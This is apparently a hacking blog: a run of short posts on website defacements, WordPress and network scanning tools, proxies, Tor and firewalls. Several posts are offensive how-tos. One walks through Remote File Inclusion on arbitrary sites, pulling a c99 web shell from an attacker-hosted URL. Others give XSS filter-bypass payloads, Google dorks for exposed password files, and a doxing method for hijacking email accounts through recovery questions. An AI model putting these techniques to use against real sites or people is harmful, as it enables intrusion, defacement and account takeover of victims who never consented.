DNS Cache Poisoning attack on Google ,Gmail , Yahoo ,Youtube

Ha

Hacker with nickname AlpHaNiX deface Google, Gmail, Youtube, Yahoo, Apple etc domains of Democratic Republic of Congo. Hacker use strategy so-called DNS cache poisoning.

What is Cache Poisoning

Cache poisoning, also called domain name system (DNS) poisoning or DNS cache poisoning, is the corruption of an Internet server's domain name system table by replacing an Internet address with that of another, rogue address. When a Web user seeks the page with that address, the request is redirected by the rogue entry in the table to a different address. At that point, a worm, spyware, Web browser hijacking program, or other malware can be downloaded to the user's computer from the rogue location

Hacked Websites are:

http://apple.cd/
http://yahoo.cd/
http://gmail.cd/
http://google.cd/
http://youtube.cd/
http://linux.cd/
http://samsung.cd/
http://hotmail.cd/
http://microsoft.cd/

Read More

Mantra - Open Source Security Framework

Mantra - Mantra is a collection of hacker tools, add ons and scripts based on firefox .

Firefox is an hacker friendly tool from starting , its rich assets are its addons they only work has an independent tools for hacking.

A group of security professionals integrated all this add ons, scripts and made a framework called mantra.
As of now Mantra is just a security toolkit rather than a full-fledged framework

Some of the features of Mantra

1. Its built on top of the browser - Saves lots of man power and learning curve.
2. It is Cross platform and flexible - It can easily run on Windows, Mac and Linux natively
3. Its open source, so you are free to use it or modify it your own way.

Mantra can be helpful to perform all five phases of attacks like reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access and covering tracks.

Download

The Mantra framework can be available in Linux and Windows

You will get the download of mantra framework from http://www.getmantra.com/download

**Studied from clubhack

Read More

Maharastra Highway Police Website Got Hacked

                                   Not only International Law Enforcement and Police Under Hacker's attack, Even our Local Police websites and Database also become of Victim of breaches mostly once a day.

A hacker With name "powerin10" take responsibility to hack Maharashtra Highway Police website. A mirror of this hack is available here.

Hacker is member of Bangladesh Cyber Army.

Read More

WPScan - Wordpress Security Scanner

 Wordpress Security Scanner

WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach.

WPScan is written in Ruby

The features of WPScan are :

  It will enumerate the Usernames
  Weak Password Cracking
  Plugin Vulnerability Enumeration
  Version Enumeration
  Vulnerability Enumeration
  etc ........

It can be free downloaded from http://code.google.com/p/wpscan/

OR

It is available in Backtrack 5  /pentest/web/wpscan/

Syntax:
         ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

Read More

Plecost - Wordpress fingerprint tool

Plecost

A Wordpress finger print tool available in open source with Backtrack 5

Plecost retrieves the information contained on the Web site to be analyzed, and also allows a search on the results indexed by Google.

It bases your analysis from information contained in the files of development included by WordPress and them plugins. The plugins list is generated based on the list of "Most populars" from wordpress.org, and linked with related entries in CVE.mitre.org.

plecost is available at http://code.google.com/p/plecost

the plecost will finger print the plugins and give the corresponding CVE entries also

syntax:

     ./plecost-0.2.2-9-beta.py -i wp_plugin_list.txt http://www.example.com -G

      

Read More

WafW00f - A Web Application Audit Tool

WAFW00F - Web Application Firewall Detection Tool

WafW00f is written in  phython and is available freely on the net,

the tool is developed By Sandro Gauci && Wendel G. Henrique.

they mentions that Web Application Firewalls (WAFs) :

• can be detected, because they leave several signs
• can be bypassed by changing the attack in order to avoid rules

To help detect and bypass WAFs, they released wafw00f

WAFW00F allows one to identify and fingerprint WAF products protecting a website

Download Link

http://waffit.googlecode.com/svn/trunk/ waffit-read-only

or you can find it in Backtrack 5 R1 version

You can find it in   /pentest/web/waffit/


example 1: /pentest/web/waffit# ./wafw00f.py http://www.example.com

output:

Checking http://www.example.com
Generic Detection results:
No WAF detected by the generic detection

example 2: /pentest/web/waffit# ./wafw00f.py http://www.example2.com

output:

Checking http://www.example2.com
The site http://www.example2.com is behind a Citrix NetScaler

Read More

Google offers encrypted Web search by default

Google announced today that it will encrypt by default Web searches and results for users who are signed in.

People who don't have a Google account or are signed out can go directly to https://www.google.com, the company said in a blog post.

Encrypting the communications between an end user and the Google search engine servers will protect against snooping by anyone who might be sniffing on an unsecured Wi-Fi network, for instance. Secure Sockets Layer (SSL) is available now for Web search, image search and all the search modes except for Maps, Google said in this separate post.

For example, when you search over SSL for "dogs," Google encrypts the search and results that are returned, but clicking on a result ends the encrypted connection unless the destination is on "https://."

"Although SSL offers clear privacy and security benefits, it does not protect against all attacks. The benefits of SSL depend on your browser's list of trusted root certificates, the security of the organizations that issue those certificates, and the way in which you and your browser handle certificate warnings," Google says. "In addition, while the connection between your computer and Google will be encrypted, if your computer is infected with malware or a keylogger, a third party might also be able to see the queries that you typed directly."

Google began SSL default in Gmail in January 2010 and began offering an encrypted search option four months later.

Originally posted at InSecurity Complex

Read More

Mobile Malware Is on the Rise, but Is It a Real Threat?

Smartphones and tablets may be the hottest tickets in electronics today, but with that marquee status comes a dark side. Mobile viruses on the rise, and 2010 saw a huge increase in malware on mobile devices, up 46 percent from 2009, says a new threat report from security software maker McAfee.

The increase in mobile malware isn't unexpected, as smartphones have become more popular in the last year, with smartphones recently passing PCs in sales for the first time ever. Adam Wosotowsky, an engineer at McAfee, says Symbian is the most at-risk mobile platform, though Google Android devices and jailbroken iPhones are popular targets, too.

"I wouldn't call it unexpected," he says. "We've seen mobile malware growing exponentially year-over-year for a while. It's much more of a big deal now that smartphones are basically becoming little computers."

Besides being greater in number, mobile malware is getting more sophisticated, Wosotowsky says. Viruses that infect cell phones typically force the phone to do things like send texts or make calls to specific numbers and at specific times so the malware creator profits. Now that phones are capable of so much more, the viruses that infect them are following suit.

"There are a lot more ways for the criminal enterprise to make money," he says. "You have the ability to infect the phones and actually build some kind of botnet infrastructure. We have seen indications of ways to start to establish command and control [on phones]."

Seeing "indications" and seeing a virus are two different things, however. Ondrej Vlcek, CTO of Avast, a security software company that gives away its product, says the mobile malware threat, while a problem, isn't anywhere near as threatening as malware on PCs.

"It's still relatively small compared to the traditional platforms," Vlcek says. "Also, the payloads are usually less invasive—sort of like Windows malware ten, fifteen years ago."

Vlcek is on board with the McAfee report's conclusions about the vulnerabilities with Adobe products, however. The report says malware developers "heavily" exploited weaknesses in Flash and PDF applications. Flash videos are especially ripe targets, Wosotowsky says, since the application runs code on both the client and server sides.

"Flash is extremely popular and everybody's using it. That makes it a big target," he says. "I'm sure Adobe is going to re-architect some of the security that's associated with it."

Read More

What Is Doxing? – Doxing And It’s Uses

Doxing is the process of gaining information about someone or something by using sources on the Internet and using basic deduction skills. Its name is derived from “Documents” and in short it is the retrieval of “Documents” on a person or company.

You’re probably thinking, “Okay, so basically it’s getting information from searching someone’s email on Google right?” in a sense yes, but there are actually easier ways to get someone’s information online. The most popular and most common method is to use a website called Pipl(http://www.pipl.com/). Pipl allows you to search for full names, emails, usernames, and even phone numbers, thus making it a very useful tool for hackers. Another source hackers can use is Facebook (http://www.facebook.com). Sure, Facebook allows full name searches, but most hackers aren’t using it for its name search; they’re using it for its email search.

The main goal when Doxing is to find the target’s email (if you don’t have it). Your email is essentially your passport online; you sign up for websites using it, you have personal information on it, and if someone has access to it, they can essentially pretend to be you online. Once the hacker has the email, all he has to do is put it into Facebook or Pipl and he will be able to find you, assuming the email he has is connected to some account you have online. On the flipside of this, in order to find your email, the hacker either has to guess your email, befriend you on Facebook,or, hack one of your vulnerable friends and view your email that way. Once he’s done that, you’re in trouble.

Now, you’re probably thinking, “How’s he going to hack me with just my email?” well, that’s where Doxing comes in handy. If he can view your Facebook account, or he can find some other bit of information about you using Pipl, he can do what’s called reverting. Reverting is the process of using the target’s email’s recovery questions to gain access to the target’s email. Now, you may be thinking, “How’s he gonna guess my recovery question answers?” well, take a second look at your recovery questions and ask yourself, “Can someone find this answer online?” If you answered yes, then you’re vulnerable to reverting.

Any hacker reading this, that didn’t previously know about reverting, would probably look at this and say

“This would never work!” but you have to remember… we’re all humans, and we all make mistakes. Surprisingly, this method works more often than you’d think, but it is not for anyone who is lazy. Doxers tend to spend a while searching around the web for information that they can use.

Chances are, you’ve made some mistakes online, and if a skilled Doxer finds that mistake, then you’re in trouble. The Doxing method is based purely on the ability of the hacker to recognize valuable information about his target and use this information to his benefit. It is also based around the idea that, “The more you know about your target, the easier it will be to find his or her flaws.”

How can you insure that you won’t be Doxed? Well, as the Internet becomes more and more useful and addicting, it will become harder to not get Doxed. The main issue for most victims is their security questions, and their password security. If a victim has a very easy-to-find recovery question, then the victim will be easily reverted within a matter of seconds. Also, if the victim has a simple password, it could get brute forced simply by using a wordlist that applies to the victim’s interests, likes, and fancies (of course, this method is not as popular).

So, the main rule to not getting hacked is: Have secure passwords, and almost impossible to guess recovery questions. The main rule to not getting Doxed is… to just stay off the Internet; but, who wants to do that?

Read More

How to Change MAC Address

In computer networking, the Media Access Control (MAC) address is every bit as important as an IP address. Learn in this article how MAC addresses work and how to find the MAC addresses being used by a computer...

What Is a MAC Address?

The MAC address is a unique value associated with a network adapter. MAC addresses are also known as hardware addresses or physical addresses. They uniquely identify an adapter on a LAN.

MAC addresses are 12-digit hexadecimal numbers (48 bits in length). By convention, MAC addresses are usually written in one of the following two formats:

MM:MM:MM:SS:SS:SS

MM-MM-MM-SS-SS-SS

The first half of a MAC address contains the ID number of the adapter manufacturer. These IDs are regulated by an Internet standards body. The second half of a MAC address represents the serial number assigned to the adapter by the manufacturer. In the example,

00:A0:C9:14:C8:29

The prefix

00A0C9

indicates the manufacturer is Intel Corporation.

How to find MAC Address?

Go to start -> Run ->Type cmd and press Enter

A DOS window will appear. This is also commonly called a Command Prompt

Now type IPCONFIG /ALL at the command prompt and hit ENTER. This window will now display the configuration of all of your network adapters. If you have multiple network adapters in your PC you'll see multiple addresses. The MAC Address you're looking for will be listed under the heading Ethernet Adapter

Now look for the Physical Address. It should look something like 00-50-BA-D1-BA-71

To close the window when you are finished, type EXIT at the command prompt and hit the ENTER key

How to change MAC Address?

Go to Start > Control panel > Network and Internet connections , then right click on the that network connection whose network card’s MAC address you want to change and click Properties.

In the General tab, click on the Configure button.

Then click on the Advanced tab.

In the Property section, you have to see an option saying Network Address or Locally Administered Address. Select it and change the radio button to Value ( Not present means that your network card will use the default MAC address programmed by the manufacturer ).

Now type in a new MAC address and click OK.

Restart the computer.

To make sure that the change is successful go to command prompt ( Start > Run, type in cmd and click OK ) then type in ipconfig /all.

Read More

White hat hacker exposes NASA servers' vulnerabilities

White hat hacker exposes NASA servers' vulnerabilities

A Romanian "white hat" hacker has claimed to have broken into a site of the National Aeronautics and Space Administration (NASA), and published a screenshot of the compromised server on his site.

White hat hackers are programmers who break into computer systems for the sake of exposing security flaws, instead of exploiting them for malevolent purposes.

In this case, "TinKode" hacked a file transfer protocol (FTP) server related to NASA's Earth Observation System at Goddard Space Flight Center.

"I don't do bad things. I only find and make public the info. Afterwards I send an email to them to fix the holes. It's like an security audit, but for free," TinKode said in an interview posted on NetworkWorld.

The NetworkWorld story said that, after hacking into servir.gsfc.nasa.gov, TinKode sent an email alert of the hack to NASA's webmaster.

His screenshot shows folders like RADARSAT, ASAR, ASAR_Aus, ASAR_Africa, and ASAR_Haiti.

ASAR is short for Advanced Synthetic Aperture Radar, a technology used by NASA.

One month ago, TinKode exposed a similar security hole at another space agency by hacking into a server operated by the European Space Agency at www.esa.int.

He then leaked a list of FTP accounts, email addresses and passwords for administrators and editors.

Early this year, TinKode and hackers Ne0h and Jackh4x0r hacked into the Web servers hosting MySQL.com, proving it was vulnerable to SQL injection as well as XSS.

In the NetworkWorld interview, TinKode said making the breaches public makes the companies fix the vulnerability faster.

He also said finding security holes is a "hobby" for him.

"I am doing this because finding security holes represents a hobby for me. If someone wants to hire me, we can discuss, isn't a problem," he said.

Read More

Private and Public IP Addresses

What are Private and Public IP Addresses

Internet Protocol (IP) addresses are usually of two types: Public and Private. If you have ever wondered to know what is the difference between a public and a private IP address, then you are at the right place. In this post I will try to explain the difference between a public and a private IP addres in layman’s terms so that it becomes simple and easy to understand.

What are Public IP Addresses?

A public IP address is assigned to every computer that connects to the Internet where each IP is unique. Hence there cannot exist two computers with the same public IP address all over the Internet. This addressing scheme makes it possible for the computers to “find each other” online and exchange information. User has no control over the IP address (public) that is assigned to the computer. The public IP address is assigned to the computer by the Internet Service Provider as soon as the computer is connected to the Internet gateway.

A public IP address can be either static or dynamic. A static public IP address does not change and is used primarily for hosting webpages or services on the Internet. On the other hand a dynamic public IP address is chosen from a pool of available addresses and changes each time one connects to the Internet. Most Internet users will only have a dynamic IP assigned to their computer which goes off when the computer is disconnected from the Internet. Thus when it is re-connected it gets a new IP.

You can check your public IP address by visiting www.whatismyip.com

What are Private IP Addresses?

An IP address is considered private if the IP number falls within one of the IP address ranges reserved for private networks such as a Local Area Network (LAN). The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks (local networks):

10.0.0.0 – 10.255.255.255 (Total Addresses: 16,777,216)

172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)

192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)

Private IP addresses are used for numbering the computers in a private network including home, school and business LANs in airports and hotels which makes it possible for the computers in the network to communicate with each other. Say for example, if a network X consists of 10 computers each of them can be given an IP starting from 192.168.1.1 to 192.168.1.10. Unlike the public IP, the administrator of the private network is free to assign an IP address of his own choice (provided the IP number falls in the private IP address range as mentioned above).

Devices with private IP addresses cannot connect directly to the Internet. Likewise, computers outside the local network cannot connect directly to a device with a private IP. It is possible to interconnect two private networks with the help of a router or a similar device that supports Network Address Translation.

If the private network is connected to the Internet (through an Internet connection via ISP) then each computer will have a private IP as well as a public IP. Private IP is used for communication within the network where as the public IP is used for communication over the Internet. Most Internet users with a DSL/ADSL connection will have both a private as well as a public IP.

You can know your private IP by typing ipconfig command in the command prompt. The number that you see against “IPV4 Address:” is your private IP which in most cases will be 192.168.1.1 or 192.168.1.2. Unlike the public IP, private IP addresses are always static in nature.

Unlike what most people assume, a private IP is neither the one which is impossible to trace (just like the private telephone number) nor the one reserved for stealth Internet usage. In reality there is no public IP address that is impossible to trace since the protocol itself is designed for transparency.

Read More

Surf Web Anonymously with TOR

What is TOR ?

Tor-proxy is a free proxy-server service that Internet users can use to hide their IP address while surfing the Web. An IP address is a number used to identify computers on the Internet, and for reasons of safety and security, it may sometimes be desirable to hide the address.

What is Vidalia ?

Vidalia is a GUI (graphical user interface) implementation for Tor, It allows the user to start, stop, and view the status of Tor; monitor bandwidth usage; view, filter, and search log messages; and configure some aspects of Tor.

Difference between an Anonymous Proxy and Tor-proxy

Well you will be wondering and saying what is the need of Tor-proxy when we are able to do the same thing using an Anonymous proxy ?. To clear your doubts lets see how an Anonymous proxy and Tor works

Working of an anonymous proxy

In the above example we are connecting to the web server through a proxy server .So a proxy server hides our identity by acting as an intermediary between us and the web server that we are accessing . But what if owner of proxy server starts reviling our identity.So we are not sure on what proxy-server to relay on to stay anonymous

Working of Tor-proxy

Tor actually works on a deeper level dealing with a computer’s SOCKETS directly.I will

not be going to deep into it as most readers will find it very difficult to understand the

explanation .In simple words Tor network uses a distributed network of nodes – of other

Tor users – to re-route all the packets from your network.What this means is – no single link can identify the source and the destination

In the above example the client passes through three different servers or nodes before reaching the actual web server. The path taken by the client is denoted by green arrows

Node 1 Knows the actual origin(client) but not the actual destination (web server)

Node 5 Neither knows the actual origin nor the actual destination.

Node 9 Knows the actual destination but not the actual origin.

Thus no one exactly knows which client is accessing which web server. So it is highly anonymous.

Using Tor and vidalia to surf the web Anonymously :-

1. First download and Install Tor-bundle which includes Tor and vidalia from Here ,to get the password click Here

2. Open Tor-bundle and check all components as shown , follow the on screen instructions to finish instillation process

3. Now Open Vidalia Control Panel from task bar and Click on Start Tor

4. Now open Mozilla Firefox browser,and click on red highlighted Tor Disabled ON which is at the right hand corner of the browser , now it will turn green and say Tor Enabled.

To check weather your behind a proxy go to www.whatismyip.com you can see a different ip address after setting up Tor

Disadvantages of Tor :-

Since it passes through multiple Tor nodes, the Internet connection can be slow. Even with all this, Tor is not very safe. There are potential pitfalls and security threats. Tor by itself does not encrypt the payload , at the exit node .So a sniffer at the exit node can gather all the information. as show

So Unless the application encrypts data using (SSL), we can gather all the information form the exit node using a sniffer

**This post is taken from hackhaholic

Read More

How Firewall Works

If you have been using the Internet for any length of time, and especially if you work at a larger company and browse the Web while you are at work, you have probably heard the term firewall used. For example, you often hear people in companies say things like, "I can't use that site because they won't let it through the firewall."

How Firewall Works ?

Firewalls are basically a barrier between your computer and the internet. A firewall can be simply compared to security guard who stands at the entrance of your house and filters the

visitors coming to your place. He may allow some visitors to enter while denying others whom he suspects of being intruders. Similarly firewall is a software program or a hardware device that filters the information coming through the internet in form of packets to your personal computer or a computer network.

Firewalls may decide to allow or block network traffic between devices based on the rules that are pre-configured or set by the firewall administrator. Most personal firewalls such as Windows firewall operate on a set of pre-configured rules that are most suitable under normal circumstances so that the user need not worry much about configuring the firewall.

Personal firewalls are easy to install and use and hence preferred by end-users for use on their personal computers. However large networks and companies prefer those firewalls that have plenty of options to configure so as to meet their customized needs. For example, a company may set up different firewall rules for FTP servers, Telnet servers and Web servers. In addition the company can even control how the employees connect to the Internet by blocking access to certain websites or restricting the transfer of files to other networks. Thus in addition to security, a firewall can give the company a tremendous control over how people use the network.

Firewalls use one or more of the following methods to control the incoming and outgoing traffic in a network:

1. Packet Filtering: In this method packets (small chunks of data) are analyzed against a set of filters. Packet filters has a set of rules that come with accept and deny actions which are pre-configured or can be configured manually by the firewall administrator. If the packet manages to make it through these filters then it is allowed to reach the destination; otherwise it is discarded.

2. Stateful Inspection: This is a newer method that doesn’t analyze the contents of the packets. Instead it compares certain key aspects of each packet to a database of trusted source. Both incoming and outgoing packets are compared against this database and if the comparison yields a reasonable match, then the packets are allowed to travel further. Otherwise they are discarded.

Firewall Configuration

Firewalls can be configured by adding one or more filters based on several conditions as mentioned below:

1. IP addresses
 In any case if an IP address outside the network is said to be unfavorable, then it is possible to set filter to block all the traffic to and from that IP address. For example, if a certain IP address is found to be making too many connections to a server, the administrator may decide to block traffic from this IP using the firewall.

2.Domain names
Since it is difficult to remember the IP addresses, it is an easier and smarter way to configure the firewalls by adding filters based on domain names. By setting up a domain filter, a company may decide to block all access to certain domain names, or may provide access only to a list of selected domain names.

3. Ports/Protocols
Every service running on a server is made available to the Internet using numbered ports, one for each service. In simple words, ports can be compared to virtual doors of the server through which services are made available. For example, if a server is running a Web (HTTP) service then it will be typically available on port 80. In order to avail this service, the client needs to connect to the server via port 80. Similarly different services such as Telnet (Port 23), FTP (port 21) and SMTP (port 25) services may be running on the server. If the services are intended for the public, they are usually kept open. Otherwise they are blocked using the firewall so as to prevent intruders from using the open ports for making unauthorized connections.

4. Specific words/Phrases
 A firewall can be configured to filter one or more specific words or phrases so that, both the incoming and outgoing packets are scanned for the words in the filter. For example, you may set up a firewall rule to filter any packet that contains an offensive term or a phrase that you may decide to block from entering or leaving your network.

Hardware vs Software Firewalls

Hardware firewalls provide higher level of security and hence preferred for servers where security has the top most priority whereas, the software firewalls are less expensive and are most preferred in home computers and laptops. Hardware firewalls usually come as an in-built unit of a router and provide maximum security as it filters each packet in the hardware level itself even before it manages to enter your computer. A good example is the Linksys Cable/DSL router.

Why Firewall ?

Firewalls provide security over a number of online threats such as Remote login, Trojan backdoors, Session hijacking, DOS & DDOS attacks, viruses, cookie stealing and many more. The effectiveness of the security depends on the way you configure the firewall and how you set up the filter rules. However major threats such as DOS and DDOS attacks may sometimes manage to bypass the firewalls and do the damage to the server. Even though firewall is not a complete answer to online threats, it can most effectively handle the attacks and provide security to the computer up to the maximum possible extent.

Read More

How to Surf web Anonymously with Proxies

Are you looking to surf the Internet without anyone knowing your location or details? Do you want to regain access to a banned website or forum? Well you’ve come to the right place as in this article I will answer the frequently asked question, How to Surf the Web Anonymously? , How to access restricted websites?

There are many ways to surf the web anonymously. But the best way to surf the web Anonymously without spending a single penny is by using Proxies.

What is a Proxy?

A Proxy is an ipaddress of a Server(Proxy Server) that is placed in between your computer and the internet.

The advantage of a proxy is that your real IP address is Hidden so when you hack your giving the IP address of the proxy sever and not your real IP address Same way if your a normal Internet user the hacker won't get your real IP but the IP of the proxy server.You can use it to enter site or forum that you are IP is banned
Follow the steps given below to Surf the web Anonymously

How to surf web anonymously with proxies

First we need a proxy server. There are thousands of proxy servers on the net. You can find then in google. I use the www.hidemyass.com

Select require proxy ipaddress and port from the hidemyass.com

Using Proxy In the Mozilla Firefox

1. Open Mozilla Firefox, Go to Tools menu -> Options

2. Select Advanced tab -> Network Tab -> In the connection select Settings

3. Connection Settings -> Select Manual Proxy Configuration (Radio Button)

4. Enter proxy ipadress and port and click ok.

5. Refresh the google.com page .

To check weather your proxy changed or not go to www.whatismyip.com. you can see a different ipaddress after setting up your proxy

Please comment this tutorial if you find useful

Read More

RFI(Remote File Inclusion)

Remote File Inclusion

Remote File Inclusion ( RFI ) allows the attacker to upload his file on a website server using a script. Remote File Inclusion is a common vulnerability found in many websites. Using RFI you can literally deface the websites, get access to the server. Here i am going to describe this.

Searching the Vulnerability:

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to this:

www.anywebsite.com/index.php?page=something


If you want to find more website like this try is with google dork.

inurl:index.php?page=

After going to the target website test it for RFI vulnerability. Use this:

www.anywebsite.com/index.php?page=http://www.google.com


after pressing enter if the google's homepage is there on the website, then this website is vulnerable to RFI attack.

Now you can execute your own scripts on the webserver of this website.

www.anywebsite.com/index.php?page=http://www.freehackersite.com/script.php

look at the original URL there is no extension. It means it is adding extension mnually so use "" after your url.

Now to gain access you should use c99 shell. you can download c99 shell from the link below:

c99 download link

now upload this script to any webhost and get a url of that. Let's say your url is like this:

www.mywebsite.com/c99.txt?

**Question Mark is must

now use your url in place of google url.

www.anywebsite.com/index.php?page=http://www.mywebsite.com/c99.txt?

Now the you are inside the website and you can do anything with it

Read More

Google Hacking

Google hacking doesn't mean to hack Google. Google hacking term used when a hacker tries to find vulnerable targets or sensitive data by using the Google search engine.In Google hacking hackers use search engine commands to locate sensitive data and vulnerable devices on the Internet. Google supports a multitude of operators and modifiers that add a ton of power to google searching

I am going to explain some operators used in Google hacking

intitle:

Syntax: intitle:operator

This will return all the pages that have word entered after the intitle (as we used operator here) in the title of the page. If you want to check for multiple keywords in title use allintitle in place of intitle.

allintitle:operator1 operator2....

inurl:

Syntax: inurl:operator

This will return all the pages that have word entered after the inurl in the url of a page. If you want to check for multiple keywords in url use allinurl in place of inurl.

allinurl:operator1 operator2....

site:

Syntax: site:Domain

This will return all the pages that have certain keywords in that particular site or domain.

link:

Syntax: link:URL

This will list down webpages that have links to the specified webpage.

intext:

Syntax: intext:operator

This will return all the pages that have word entered after the intext in the particular website. If you want to check for multiple keywords in website use allintext in place of intext.

allintext:operator1 operator2....

related:

Syntax: related:URL

The “related:” will list web pages that are "similar" to a specified web page. For Example:
“related:www.hyderabadhack.blogspot.com” will list web pages that are similar to the hyderabadhack homepage

cache:

Syntax: cache:URL

The cache operator will search through google’s cache and return the results based on those documents. You can alternatively tell cache to
highlight a word or phrase by adding it after the operator and URL.

info:

Syntax: info:URL

This tag will give you the information that Google has on the given URL.

filetype:

Syntax: filetype:keyword

This will restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc).
Well, the Google’s query syntaxes discussed above can really
help people to precise their search and get what they are
exactly looking for.

Other Queries

inurl:admin filetype:txt

inurl:admin filetype:db

inurl:admin filetype:cfg

inurl:mysql filetype:txt

inurl:passwd filetype:txt

inurl:iisadmin

inurl:auth_user_file.txt

inurl:orders.txt

inurl:"wwwroot/*."

inurl:adpassword.txt

inurl:webeditor.php

inurl:file_upload.php

Looking for vulnerable sites using Google Hacks

allintitle: "index of /root”

allintitle: "index of /admin”

Read More

Block any Website on your computer without any software

There are many people who want some website inaccessible from their computer. Most of the parents want to block some websites on their computer system. Here i am going to write a well known an easy way to do this.

Steps:

1. go to C:\WINDOWS\system32\drivers\etc
2. Find a file named "HOSTS"
3. Open this file in notepad
4. Under "127.0.0.1 localhost" Add 127.0.0.2 www.xyz.com , Now www.xyz.com site will no longer be accessible.

You can add as many url of websites under this by increasing last no. of ip as

127.0.0.3 www.abcxyz.com
127.0.0.4 www.xyzas.com

an so on.

To unblock these website only erase the line corresponding to that website.

Read More

NMAP Tutorial

I think everyone in the security field known this popular tool, recently evolved into the 5.x series.

Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and many other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Nmap was originally command line tool that has been developed for only Unix/Linux based operating system but now its windows version is also available and eases to use

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

For a quick and simple scan use.

$ nmap 192.168.x.x

Starting Nmap 5.21 (http://nmap.org) at 2011-04-10 23:06 PKT

Nmap scan report for 192.168.x.x

Host is up (0.0012s latency).

Not shown: 997 filtered ports

PORT STATE SERVICE

21/tcp open ftp

23/tcp open telnet

80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 10.62 seconds

Nmap - Interesting options

-f fragments packets

-D Launches decoy scans for concealment

-I IDENT Scan – find owners of processes (on UNIX systems)

-b FTP Bounce

Port Scan Types

TCP Connect scan

TCP SYN scan

TCP FIN scan

TCP Xmas Tree scan (FIN, URG, and PUSH)

TCP Null scan

TCP ACK scan

UDP scan

Nmap works on the basic scanning types like:

TCP connect() scanning

TCP SYN scanning

TCP FIN scanning

Fragmentation scanning

TCP reverse ident scanning

FTP bounce attack

UDP ICMP port unreachable scanning

UDP recvfrom() and write() scanning

ICMP echo scanning

Operating system detection or OS fingerprinting is the important part of scanning you should know about the operating system of target machine to launch an available exploit on it. Nmap provides you know about running operating system although you can find it by using banner grabbing but why doing too much job. Use -O for operating system.

$ nmap -O 192.168.x.x

Read More

Websecurify - Free Web Application Vulnerability Scanner

Websecurify is a powerful web application security testing environment designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies. Websecurify is an integrated web security testing environment, which can be used to identify vulnerabilities by using advanced browser automation, discovery and fuzzing technologies. The platform is designed to perform automated as well as manual vulnerability tests and it is constantly improved and fine-tuned by a team of world class web application security penetration testers and the feedback from an active open source community.

The built-in vulnerability scanner and analyzation engine is capable of automatically detecting many types of web application vulnerabilities as you proceed with the penetration test. The list of automatically detected vulnerabilities includes:

* SQL Injection
* Local and Remote File Include
* Cross-site Scripting
* Cross-site Request Forgery
* Information Disclosure Problems
* Session Security Problems
* many others including all categories in the OWASP TOP 10

Main Features

Some of the main features of Websecurify include:

* Available for all major platforms (Windows, Mac OS, Linux)
* Simple to use user interface
* Built-in internationalization support
* Easily extensible with the help of add-ons and plug-ins
* Exportable and customizable reports with any level of detail
* Modular and reusable design
* Powerful manual testing tools and helper facilities
* Team sharing support
* Powerful analytical and scanning technology
* Built-in service and support integration
* Scriptable support for JavaScript and Python
* Extensible via many languages including JavaScript, Python, C, C++ and Java

This is an excellent and extremely easy to use tool, I highly recommend giving it a go. You can download it here - http://www.websecurify.com/download

Read More

Cross Site Scripting

Previously I wrote about the OWASP top 10 vulnerabilities. However my GURUJI asked me to post each topic individually.

Cross Site Scripting

Robert ‘rsnake’ Hensen is considered as Guru of XSS .Lets learn about what the XSS is

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Cross-site scripting holes in general can be seen as vulnerabilities which allow attackers to bypass security mechanisms. By finding clever ways of injecting malicious scripts into web pages an attacker can gain access privileges to sensitive page content, session cookies, and a variety of other objects.


XSS can be classified into three types


1. Non-Persistent

2. Persistant and

3. DOM based


Non-Persistent:


The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website. It shows up when the webpage get the data provided by the attacker's client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.


Persistent:

A persistent XSS is also known as Stored XSS. The Persistent XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, file system, or other location), and later displayed to users in a web page without being encoded using HTML entities. A classic example of this is with online message boards, where users are allowed to post.


DOM Based XSS:

The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine.

The attacker creates a malicious site and sends to the victim. When the victim opens the vulnerable webpage or site on his machine the vulnerable page executes commands with the victim’s privileges and the attacker can easily gain control on the victim computer.


Finding the XSS Vulnerabilities


We most have tried finding an XSS hole by inserting a script like this

<script>alert('XSS')</script>

in Search fields and hoping for a box to popup saying XSS. But its not always the way to find a XSS vulnerability.

Some time we need to bypass the filters.

Here we will be using a JavaScript built in function called String.FromCharCode() that is used to encode/decode strings

For Example


<script>alert('XSS')</script>

and

<script>alert(String.fromCharCode(88, 83, 83))</script>


Note: 88 and 83 are ASCII values for X and S respectively. Visit this http://www.asciitable.com for more.

We have many ways to bypass filters. Some of are

site.com/search.php?q="><script>alert('Hyderbad Hacker')</script>

site.com/search.php?q="><script>alert("Hyderbad Hacker")</script>

site.com/search.php?q="><script>alert("Hyderbad Hacker");</script>

site.com/search.php?q="><script>alert(/Hyderbad Hacker");</script>

site.com/search.php?q=//"><script>alert(/Hyderbad Hacker/);</script>

site.com/search.php?q=abc<script>alert(/Hyderbad Hacker/);</script>

site.com/search.php?q=abc"><script>alert(/Hyderbad Hacker/);</script>

Securing XSS

To fix the XSS Vulnerability use htmlentities and

Sanitize all user input and escape special characters in your SQL Queries

For Example

The vulnerability code site looks like this

<span class="abc">Search result :</span>&nbsp;<strong><?php echo $_POST['vulnerability']; ?></strong>

To secure change this to

<span class="abc">Search result :</span>&nbsp;<strong><?php
if(isset($_POST['vulnerability']))

{ echo htmlentities($_POST['vulnerability']); } ?></strong>

use htmlspecialchars() function in PHP

other functions:

htmlentities() quotes

strip_tags()

--

